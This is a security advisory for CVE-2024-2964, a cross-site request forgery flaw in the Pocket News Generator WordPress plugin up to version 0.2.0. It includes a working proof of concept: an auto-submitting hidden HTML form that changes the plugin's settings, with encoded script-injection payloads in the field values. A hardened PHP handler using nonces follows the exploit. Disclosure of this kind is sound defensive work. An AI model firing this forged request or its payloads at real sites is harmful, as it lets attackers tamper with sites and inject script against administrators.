Description

The Pocket News Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.2.0. This is due to missing or incorrect nonce validation on the option_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

Severity

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Version

<= 0.2.0

PoC

<html>
  <!-- eneriiii<3-->
  <body>
    <form action="http://[ASSETS]/wp-admin/options-general.php?page=pocket_news_generator_options_page" method="POST">
      <input type="hidden" name="consumer&#95;key" value="eneriiiiiiiiiiii&lt;3&lt;&#33;&#45;&#45;&gt;&lt;Svg&#32;OnLoad&#61;&#40;confirm&#41;&#40;666&#41;&#45;&#45;&gt;&apos;&gt;" />
      <input type="hidden" name="access&#95;token" value="eneriiiiiiiiiiii&lt;3&lt;&#33;&#45;&#45;&gt;&lt;Svg&#32;OnLoad&#61;&#40;confirm&#41;&#40;666&#41;&#45;&#45;&gt;&apos;&gt;" />
      <input type="hidden" name="format" value="eneriiiiiiiiiiii&lt;3&lt;&#33;&#45;&#45;&gt;&lt;Svg&#32;OnLoad&#61;&#40;confirm&#41;&#40;666&#41;&#45;&#45;&gt;&apos;&gt;" />
      <input type="hidden" name="action" value="register" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
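
For comparison with the forged request above, a settings handler that validates a nonce before saving. This is an added example, not the plugin's own code: the function name png_option_page, the option name png_settings and the nonce names are assumptions, and only the field names (consumer_key, access_token, format, action=register) come from the PoC.

```php
<?php
// Added example: hypothetical hardened settings page, not the plugin's source.
// 'png_settings', PNG_NONCE_ACTION and PNG_NONCE_FIELD are assumed names.

const PNG_NONCE_ACTION = 'png_save_settings';
const PNG_NONCE_FIELD  = 'png_nonce';

function png_option_page() {
    // Only administrators may view or change the settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }

    if ( 'POST' === $_SERVER['REQUEST_METHOD']
        && isset( $_POST['action'] ) && 'register' === $_POST['action'] ) {
        // Dies with a 403 unless the request carries a nonce minted for this
        // user and action; a form hosted on another site cannot supply one.
        check_admin_referer( PNG_NONCE_ACTION, PNG_NONCE_FIELD );

        $settings = array();
        foreach ( array( 'consumer_key', 'access_token', 'format' ) as $key ) {
            $raw = isset( $_POST[ $key ] ) ? wp_unslash( $_POST[ $key ] ) : '';
            // Strip tags and control characters before storing. If a field
            // must allow markup, filter it with wp_kses_post() instead.
            $settings[ $key ] = sanitize_text_field( $raw );
        }
        update_option( 'png_settings', $settings );
    }

    $saved = wp_parse_args(
        get_option( 'png_settings', array() ),
        array( 'consumer_key' => '', 'access_token' => '', 'format' => '' )
    );
    ?>
    <form method="post">
        <?php wp_nonce_field( PNG_NONCE_ACTION, PNG_NONCE_FIELD ); ?>
        <input type="hidden" name="action" value="register" />
        <?php foreach ( $saved as $key => $value ) : ?>
            <!-- esc_attr() keeps stored values from breaking out of the attribute -->
            <input type="text" name="<?php echo esc_attr( $key ); ?>"
                   value="<?php echo esc_attr( $value ); ?>" />
        <?php endforeach; ?>
        <?php submit_button(); ?>
    </form>
    <?php
}
```

The nonce check is what stops the forged POST; the sanitizing and escaping are a separate layer that keeps values like those in the PoC from being rendered as markup if they are ever stored.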

Reference

  • https://plugins.trac.wordpress.org/browser/pocket-news-generator/trunk/pocket-news-generator.php#L77
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pocket-news-generator/pocket-news-generator-020-cross-site-request-forgery-to-settings-update
  • https://www.cve.org/CVERecord?id=CVE-2024-2964